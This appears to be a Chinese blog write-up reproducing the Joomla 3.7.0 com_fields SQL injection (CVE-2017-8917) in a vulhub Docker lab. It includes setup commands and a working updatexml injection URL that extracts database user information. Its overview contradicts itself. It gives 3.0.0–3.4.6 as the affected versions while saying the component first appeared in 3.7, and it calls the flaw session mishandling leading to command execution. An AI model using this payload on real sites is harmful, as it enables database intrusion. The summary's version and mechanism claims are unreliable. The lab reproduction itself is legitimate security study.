Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞

本文详细介绍了Joomla CMS的一个安全漏洞,涉及版本从3.0.0到3.4.6。攻击者可利用组件com_fields的session处理问题,通过发送恶意HTTP请求获取服务器权限。复现过程中,使用了vulhub的Joomla CVE-2017-8917环境,展示了漏洞利用的步骤。警告读者不得用于非法操作,仅供技术交流。
摘要由CSDN通过智能技术生成

漏洞概述

信息填对后,会显示安装成功com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何能访问你站点的用户都可以发起攻击

漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。

影响范围:

Joomla 3.0.0-3.4.6

复现过程

这里使用3.7.0版本

使用vulhub

进入/joomla/CVE-2017-8917目录,启动docker

docker-compose build
docker-compose up -d

启动后访问 http://your-ip:8080即可看到Joomla的安装界面,当前环境的数据库信息为:

  • 数据库地址:mysql:3306
  • 用户:root
  • 密码:root
  • 数据库名:joomla

填入上述信息,正常安装即可。

 信息填对后,会显示安装成功

 删除installation目录

重新访问后显示如下

payload注入:

192.168.xxx.xxx:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

显示如下:

也可输入version()、localhost()

 

 

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值